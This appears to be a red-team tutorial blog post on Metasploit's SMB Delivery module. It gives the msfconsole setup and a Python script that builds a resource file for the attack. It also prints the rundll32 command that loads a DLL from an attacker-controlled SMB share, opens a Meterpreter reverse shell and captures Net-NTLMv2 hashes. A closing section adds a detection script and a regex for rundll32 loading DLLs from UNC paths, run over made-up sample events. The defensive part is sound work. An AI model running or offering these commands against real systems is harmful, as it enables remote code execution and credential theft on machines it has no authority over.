DLL Injection Over SMB Service
Privilege Escalation & Defense Evasion — MITRE ATT&CK T1055.001 (Process Injection: Dynamic-link Library Injection)
Dynamic-link libraries, known as DLLs, are shared modules of code and data that Windows programs load at runtime instead of compiling that functionality into each executable. If a DLL is malicious, whatever process loads it runs the attacker's code in its own memory, with its own privileges, and can be used for various nefarious operations.
An attacker can write a malicious DLL and have it loaded into a running process to elevate privileges or evade detection, since the code then executes inside a trusted process. They can use this technique to gain initial access to a network or establish persistence.
In a red team assessment, attackers can embed a DLL in a macro within a Microsoft Office document and deliver it to the target through a spear-phishing campaign. Once the target opens the document and clicks Enable Content to run the macro, the DLL payload triggers, and the attacker gains a reverse shell that allows them to execute commands on the compromised machine.
In this post, we will learn about the Metasploit module SMB Delivery (exploit/windows/smb/smb_delivery), which generates a malicious DLL payload and serves it from an SMB server that the module runs on the attacking machine.
- Metasploit Module — SMB Delivery
- Windows machine as a target
- TCP 445 reachable from the target to the attacking machine, where the module's SMB server listens (a UNC path gives the Windows SMB client no way to specify another port)
- The goal is to gain initial access to a network or establish persistence.
On the Kali machine, start Metasploit with sudo msfconsole, search for the SMB Delivery module (search smb_delivery), and select it with use 0 (or use exploit/windows/smb/smb_delivery, which does not depend on the order of the search results). Type show options to see the module's options. The SMB server options are SRVHOST, the address on the attacking machine that the SMB server binds to (not the target's IP address), and SRVPORT, which stays at 445 because that is the port the Windows SMB client connects to. The payload can be any reverse_tcp payload; in this demo, I used
💡 One thing to note is that I had trouble setting the IP address of the SRVHOST with this module. Every time I ran the exploit with a specified IP address, I would get BindFail errors — “[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable.”
After researching and digging into older comments in GitHub for Metasploit bind errors, I learned that this module is buggy on the Metasploit framework version v6.2.4-dev. The only solution that worked for me was running the exploit without setting the SRVHOST IP address (0.0.0.0) and later replacing it with the listener IP address.
For the payload options, set LHOST to the listener address (your attacking machine's IP address) and LPORT to any port that is not already in use. Once everything is ready, type exploit to run the module.
The module then prints the command to run on the target, in this case rundll32.exe \\0.0.0.0\tASoq\test.dll,0. Because SRVHOST was left at 0.0.0.0, replace that address with the attacker IP address before using the command: rundll32.exe \\192.168.233.147\tASoq\test.dll,0.
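As an added example (not code from the original post or from Metasploit), the Python script below does the pre-flight a practitioner would want before launching the module: it validates the addresses and ports, attempts the same bind that the SMB server (SRVHOST:SRVPORT) and the reverse handler (LHOST:LPORT) will perform so that the "Rex::BindFailed ... already in use or unavailable" condition shows up before msfconsole starts, renders a resource file you can run with msfconsole -q -r, and performs the 0.0.0.0 substitution on the generated rundll32 command. The payload choice (windows/meterpreter/reverse_tcp), the lab addresses and the resource-file approach are this example's own assumptions; run it as root, like msfconsole, because SRVPORT 445 is a privileged port.

```python
import ipaddress
import socket
from typing import List

# Module path is Metasploit's; the payload is this example's choice
# (any reverse_tcp payload fits the walkthrough).
MODULE = "exploit/windows/smb/smb_delivery"
PAYLOAD = "windows/meterpreter/reverse_tcp"


def port_is_bindable(host: str, port: int) -> bool:
    """Attempt the bind that the SMB server (SRVHOST:SRVPORT) and the reverse
    handler (LHOST:LPORT) will perform. False is the condition msfconsole
    reports as 'Rex::BindFailed ... already in use or unavailable', e.g. when
    smbd already owns TCP 445 or the address is not configured on this host."""
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.bind((host, port))
        return True
    except OSError:
        return False


def preflight(srvhost: str, srvport: int, lhost: str, lport: int) -> List[str]:
    """Return a list of problems; an empty list means the options are usable."""
    problems: List[str] = []
    checks = (("SRVHOST", srvhost, "SRVPORT", srvport),
              ("LHOST", lhost, "LPORT", lport))
    for host_opt, host, port_opt, port in checks:
        try:
            ipaddress.ip_address(host)
        except ValueError:
            problems.append(f"{host_opt}={host!r} is not a valid IP address")
            continue  # no point trying to bind an invalid address
        if not 1 <= port <= 65535:
            problems.append(f"{port_opt}={port} is out of range")
        elif not port_is_bindable(host, port):
            problems.append(f"{port_opt}: cannot bind {host}:{port} "
                            "(msfconsole would fail with Rex::BindFailed)")
    return problems


def build_resource_script(srvhost: str, srvport: int, lhost: str, lport: int) -> str:
    """Render a msfconsole resource file; run it with: msfconsole -q -r smb_delivery.rc"""
    lines = [
        f"use {MODULE}",
        f"set SRVHOST {srvhost}",
        f"set SRVPORT {srvport}",
        f"set payload {PAYLOAD}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "exploit -j",  # background job, so the console stays usable for sessions
    ]
    return "\n".join(lines) + "\n"


def target_command(generated: str, attacker_ip: str) -> str:
    """The module prints the rundll32 command with its bind address. When SRVHOST
    was left at 0.0.0.0 the target cannot use that, so substitute the address
    it can reach, exactly as the post does by hand."""
    return generated.replace("\\\\0.0.0.0\\", f"\\\\{attacker_ip}\\")


if __name__ == "__main__":
    # Assumed lab values: the attacking machine from the post and a free port.
    srvhost, srvport, lhost, lport = "192.168.233.147", 445, "192.168.233.147", 4444
    for problem in preflight(srvhost, srvport, lhost, lport):
        print("[!]", problem)
    print(build_resource_script(srvhost, srvport, lhost, lport))
    print(target_command(r"rundll32.exe \\0.0.0.0\tASoq\test.dll,0", srvhost))
```

If the pre-flight reports that 445 cannot be bound, stop the service that holds it (typically Samba) or choose a different SRVHOST address before starting msfconsole; the module cannot move to another port because the target's SMB client will not follow.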
The generated command uses rundll32.exe, a signed Windows binary that loads a DLL and calls the export named after the comma. Here it loads the DLL straight from the UNC path on the attacker's SMB share into its own process, so the payload runs in memory as soon as the library is loaded and the attacker never has to drop the DLL on the target's disk.
The following step is to execute the command on the target machine; you can run it from the File Explorer address bar, the Run dialog, or a PowerShell or CMD prompt.
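On the defensive side, as an added example that is not part of the original post: the command the module hands out is distinctive, a Windows binary (rundll32.exe) loading a DLL from a UNC path. The Python below pulls the command line out of constructed process-creation records in the style of Sysmon Event ID 1 or Security event 4688 flattened to one line (the sample events are made up here, not real telemetry), flags rundll32 loads from UNC paths, and lets you suppress file servers you deliberately trust. The flattened field layout and the trusted_hosts allowlist are assumptions of the example.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed process-creation records (not real telemetry). Each line mimics
# the Image and CommandLine fields of a Sysmon Event ID 1 / Security 4688 event
# flattened to one line. Lines 3, 4 and 5 load a DLL over a UNC path; the rest
# are benign rundll32 usage or unrelated processes.
SAMPLE_EVENTS = [
    r'Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe shell32.dll,Control_RunDLL"',
    r'Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c dir \\fileserver\share"',
    r'Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe \\192.168.233.147\tASoq\test.dll,0"',
    r'Image=C:\Windows\SysWOW64\rundll32.exe CommandLine="C:\Windows\SysWOW64\rundll32.exe \\10.0.0.5\updates\svc.dll,DllRegisterServer"',
    r'Image=C:\Windows\System32\RUNDLL32.EXE CommandLine=""C:\Windows\System32\RUNDLL32.EXE" "\\fs01.corp.local\public\tool.dll",Start"',
    r'Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe C:\Temp\local.dll,Run"',
]

CMDLINE = re.compile(r'CommandLine="(.*)"$')

# rundll32[.exe], optionally quoted, then a UNC path \\host\share\...dll and the
# optional ",entrypoint" that rundll32 accepts after the DLL name.
RUNDLL32_UNC = re.compile(
    r'(?i)(?:^|[\\\s"])rundll32(?:\.exe)?"?\s+"?'
    r'\\\\(?P<host>[^\\\s"]+)\\(?P<share>[^\\\s"]+)\\(?P<dll>[^\s",]+)"?'
    r'(?:,(?P<entry>\S+))?'
)


@dataclass(frozen=True)
class Finding:
    host: str
    share: str
    dll: str
    entry: Optional[str]
    command_line: str


def extract_command_line(event: str) -> Optional[str]:
    """Return the CommandLine value of a flattened event, or None if absent."""
    m = CMDLINE.search(event)
    return m.group(1) if m else None


def detect_rundll32_unc(command_line: str) -> Optional[Finding]:
    """Flag rundll32 loading a DLL from a UNC path; None when the line is clean."""
    m = RUNDLL32_UNC.search(command_line)
    if not m:
        return None
    return Finding(m["host"], m["share"], m["dll"], m["entry"], command_line)


def scan_events(events: Iterable[str], trusted_hosts: Iterable[str] = ()) -> List[Finding]:
    """Run the detection over flattened events, suppressing servers on the
    assumed allowlist (tune it to the file servers your fleet really uses)."""
    trusted = {h.lower() for h in trusted_hosts}
    findings: List[Finding] = []
    for event in events:
        cmd = extract_command_line(event)
        if cmd is None:
            continue
        finding = detect_rundll32_unc(cmd)
        if finding and finding.host.lower() not in trusted:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS, trusted_hosts={"fs01.corp.local"}):
        print(f"rundll32 UNC load: \\\\{f.host}\\{f.share}\\{f.dll} entry={f.entry}")
```

A rundll32 launch whose DLL argument begins with \\ is rare in normal administration, so this rule fires on very little benign activity; pair it with the SMB connection itself (an outbound TCP 445 connection from a workstation to a host that is not a known file server) to catch the same technique when the attacker renames or proxies the execution.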
💡 This post only shows how to generate DLL payloads with the SMB Delivery module; in future posts, we will discuss how to deliver these payloads in real-world scenarios.
When the command runs successfully, a Meterpreter session opens. Because the target authenticated to the attacker's SMB server to fetch the DLL, the module also logs the NTLMv2 challenge-response (Net-NTLMv2 hash) of the user who ran the command, which can be cracked offline; in this case, it was the administrator's hash.
That’s all for this post; thanks for stopping by!!
- Dynamic link library (DLL) - Windows Client: This article describes what a dynamic link library (DLL) is and the various issues that may occur when you use DLLs…
- Process Injection: Dynamic-link Library Injection (MITRE ATT&CK): Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as…
- Abuse Elevation Control Mechanism: Bypass User Account Control (MITRE ATT&CK): Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC)…
- Hack Remote Windows PC using DLL Files (SMB Delivery Exploit) - Hacking Articles: This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads…